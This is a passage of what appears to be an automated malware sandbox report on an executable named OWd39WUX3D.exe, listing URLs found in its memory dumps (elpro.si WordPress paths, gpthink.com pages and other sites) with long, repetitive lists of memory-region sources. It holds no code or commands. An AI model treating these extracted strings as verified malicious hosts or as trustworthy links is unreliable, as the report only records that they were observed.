OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/wlwmanifest.xml
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/5
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/I
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/mL
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/
              Source: OWd39WUX3D.exe, 00000000.00000003.393078674.0000000006B7C000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393286215.0000000006B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/2
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/%E9%98%B2%E7%88%86%E6%97%A0%E7%BA%BFAP.html
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/145.html
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/product/product.php?class2=79
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 